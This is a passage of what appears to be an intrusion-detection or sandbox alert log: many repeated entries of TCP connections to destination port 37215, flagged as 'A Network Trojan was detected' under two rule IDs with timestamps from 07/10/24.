                  Source Port:58644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.468690
                  SID:2829579
                  Source Port:53198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271140
                  SID:2835222
                  Source Port:33700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.143490
                  SID:2829579
                  Source Port:56314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.898002
                  SID:2829579
                  Source Port:53274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.796387
                  SID:2835222
                  Source Port:46848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.931140
                  SID:2835222
                  Source Port:54274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.043908
                  SID:2835222
                  Source Port:49246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.234449
                  SID:2835222
                  Source Port:33032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.189377
                  SID:2835222
                  Source Port:47906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.161907
                  SID:2835222
                  Source Port:38856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.961786
                  SID:2829579
                  Source Port:39290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385980
                  SID:2829579
                  Source Port:36316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.245285
                  SID:2829579
                  Source Port:36760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.558809
                  SID:2835222
                  Source Port:43426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.035788
                  SID:2829579
                  Source Port:48186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.167079
                  SID:2835222
                  Source Port:52390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.045782
                  SID:2835222
                  Source Port:41250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.585951
                  SID:2829579
                  Source Port:42070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177633
                  SID:2835222
                  Source Port:57522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.487311
                  SID:2829579
                  Source Port:33052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.356515
                  SID:2835222
                  Source Port:47510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558614
                  SID:2835222
                  Source Port:47820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.966896
                  SID:2835222
                  Source Port:54792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.485885
                  SID:2829579
                  Source Port:55618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433814
                  SID:2829579
                  Source Port:49424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.645814
                  SID:2835222
                  Source Port:52600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.663044
                  SID:2835222
                  Source Port:43716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.537049
                  SID:2835222
                  Source Port:45988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448205
                  SID:2835222
                  Source Port:57636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.537865
                  SID:2829579
                  Source Port:40012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.633742
                  SID:2835222
                  Source Port:35138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037621
                  SID:2829579
                  Source Port:39580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.768994
                  SID:2829579
                  Source Port:60312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090801
                  SID:2835222
                  Source Port:40330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.769686
                  SID:2835222
                  Source Port:46444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953541
                  SID:2835222
                  Source Port:58310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.660346
                  SID:2835222
                  Source Port:59856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.380446
                  SID:2829579
                  Source Port:36638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.529525
                  SID:2829579
                  Source Port:59106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.390628
                  SID:2829579
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.343716
                  SID:2835222
                  Source Port:49074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.866272
                  SID:2829579
                  Source Port:40212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.457680
                  SID:2835222
                  Source Port:38584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.638467
                  SID:2829579
                  Source Port:33394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.550470
                  SID:2835222
                  Source Port:47448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.209025
                  SID:2829579
                  Source Port:35878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.811395
                  SID:2835222
                  Source Port:55582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.169251
                  SID:2829579
                  Source Port:38548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.256236
                  SID:2829579
                  Source Port:37456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.072939
                  SID:2835222
                  Source Port:50646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.729684
                  SID:2829579
                  Source Port:36524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.607530
                  SID:2835222
                  Source Port:32794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.545525
                  SID:2829579
                  Source Port:47278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.548676
                  SID:2835222
                  Source Port:58996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022407
                  SID:2835222
                  Source Port:37028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.179057
                  SID:2829579
                  Source Port:36552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.346552
                  SID:2835222
                  Source Port:55608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.785373
                  SID:2829579
                  Source Port:37376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.612350
                  SID:2835222
                  Source Port:49800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.007312
                  SID:2835222
                  Source Port:37978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.595763
                  SID:2829579
                  Source Port:41682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592748
                  SID:2829579
                  Source Port:36448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595631
                  SID:2829579
                  Source Port:32862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.562069
                  SID:2835222
                  Source Port:56742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609606
                  SID:2835222
                  Source Port:45934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.527474
                  SID:2829579
                  Source Port:50242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098508
                  SID:2835222
                  Source Port:53418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.842656
                  SID:2829579
                  Source Port:34066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994247
                  SID:2829579
                  Source Port:52248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.025929
                  SID:2835222
                  Source Port:39030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.287695
                  SID:2835222
                  Source Port:51060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.699441
                  SID:2829579
                  Source Port:34476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.230716
                  SID:2835222
                  Source Port:33896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.989706
                  SID:2829579
                  Source Port:33016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972432
                  SID:2835222
                  Source Port:38526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985938
                  SID:2835222
                  Source Port:36900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.826099
                  SID:2835222
                  Source Port:35674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.819070
                  SID:2835222
                  Source Port:35966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.868554
                  SID:2829579
                  Source Port:36320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.506758
                  SID:2829579
                  Source Port:51652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.870319
                  SID:2835222
                  Source Port:45800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.953196
                  SID:2835222
                  Source Port:56926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.037167
                  SID:2829579
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.783932
                  SID:2829579
                  Source Port:53378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.816680
                  SID:2829579
                  Source Port:56208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.689305
                  SID:2835222
                  Source Port:46948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.857509
                  SID:2835222
                  Source Port:53042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.495859
                  SID:2835222
                  Source Port:39582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.580487
                  SID:2835222
                  Source Port:51482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.369848
                  SID:2829579
                  Source Port:34708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.205582
                  SID:2829579
                  Source Port:34682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.174843
                  SID:2829579
                  Source Port:39350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.642982
                  SID:2829579
                  Source Port:47948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.710871
                  SID:2835222
                  Source Port:37408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.085026
                  SID:2835222
                  Source Port:53358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.130042
                  SID:2829579
                  Source Port:35772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.914013
                  SID:2829579
                  Source Port:53160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.791057
                  SID:2835222
                  Source Port:48406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.218998
                  SID:2829579
                  Source Port:45094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.109229
                  SID:2829579
                  Source Port:35442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2835222
                  Source Port:44828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.047442
                  SID:2829579
                  Source Port:45628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.880000
                  SID:2835222
                  Source Port:47734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.736595
                  SID:2835222
                  Source Port:60462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625472
                  SID:2829579
                  Source Port:60016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034808
                  SID:2835222
                  Source Port:51054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.416774
                  SID:2835222
                  Source Port:37846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989759
                  SID:2835222
                  Source Port:34020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.891861
                  SID:2829579
                  Source Port:55088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.561522
                  SID:2829579
                  Source Port:48436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.787399
                  SID:2829579
                  Source Port:46518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.894192
                  SID:2835222
                  Source Port:33234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.587363
                  SID:2829579
                  Source Port:48382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569954
                  SID:2829579
                  Source Port:34762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.428443
                  SID:2835222
                  Source Port:59792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.009286
                  SID:2829579
                  Source Port:36914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.518059
                  SID:2835222
                  Source Port:39668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.466176
                  SID:2835222
                  Source Port:48992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.600235
                  SID:2829579
                  Source Port:53144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.070871
                  SID:2835222
                  Source Port:60098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.407973
                  SID:2835222
                  Source Port:49598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.040763
                  SID:2829579
                  Source Port:49460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.220771
                  SID:2835222
                  Source Port:40826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099427
                  SID:2829579
                  Source Port:39048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.986652
                  SID:2835222
                  Source Port:40178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:21.455167
                  SID:2829579
                  Source Port:42396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.151006
                  SID:2829579
                  Source Port:48802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.837890
                  SID:2835222
                  Source Port:35108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339309
                  SID:2829579
                  Source Port:59624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.948971
                  SID:2835222
                  Source Port:35100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641903
                  SID:2835222
                  Source Port:43506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.869389
                  SID:2829579
                  Source Port:34520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.048533
                  SID:2835222
                  Source Port:51530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.046147
                  SID:2829579
                  Source Port:59900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.182534
                  SID:2829579
                  Source Port:59582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650241
                  SID:2835222
                  Source Port:59316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.857451
                  SID:2835222
                  Source Port:55318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.925849
                  SID:2829579
                  Source Port:40470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.917453
                  SID:2829579
                  Source Port:42688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202638
                  SID:2829579
                  Source Port:45598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.428657
                  SID:2829579
                  Source Port:53818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.128413
                  SID:2829579
                  Source Port:33394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.394014
                  SID:2829579
                  Source Port:53422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876931
                  SID:2829579
                  Source Port:36418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.004303
                  SID:2835222
                  Source Port:40670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.896457
                  SID:2835222
                  Source Port:48748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099598
                  SID:2829579
                  Source Port:48000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828037
                  SID:2835222
                  Source Port:38150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633588
                  SID:2829579
                  Source Port:56728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.683298
                  SID:2835222
                  Source Port:50538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.002170
                  SID:2835222
                  Source Port:37216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.122738
                  SID:2829579
                  Source Port:56466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.937282
                  SID:2829579
                  Source Port:52256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.489680
                  SID:2835222
                  Source Port:44300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.663156
                  SID:2835222
                  Source Port:37146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.798934
                  SID:2829579
                  Source Port:33982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.101557
                  SID:2829579
                  Source Port:55808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.133887
                  SID:2829579
                  Source Port:33040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.115496
                  SID:2835222
                  Source Port:49284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.922247
                  SID:2835222
                  Source Port:34578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090625
                  SID:2829579
                  Source Port:49230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.437797
                  SID:2829579
                  Source Port:42478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.693034
                  SID:2829579
                  Source Port:45296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739922
                  SID:2835222
                  Source Port:59416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.819376
                  SID:2829579
                  Source Port:37344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.538711
                  SID:2835222
                  Source Port:37388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.547817
                  SID:2829579
                  Source Port:38084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.684788
                  SID:2835222
                  Source Port:47702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.508243
                  SID:2835222
                  Source Port:52686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.551648
                  SID:2829579
                  Source Port:45794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.854683
                  SID:2835222
                  Source Port:56700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.805293
                  SID:2835222
                  Source Port:36540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632030
                  SID:2829579
                  Source Port:49508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.949660
                  SID:2835222
                  Source Port:59850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.348591
                  SID:2835222
                  Source Port:45362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527286
                  SID:2835222
                  Source Port:35658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.624082
                  SID:2829579
                  Source Port:50644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.988171
                  SID:2829579
                  Source Port:58594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.341806
                  SID:2829579
                  Source Port:35256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.524945
                  SID:2835222
                  Source Port:48712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.563593
                  SID:2829579
                  Source Port:41370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2829579
                  Source Port:38456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.998730
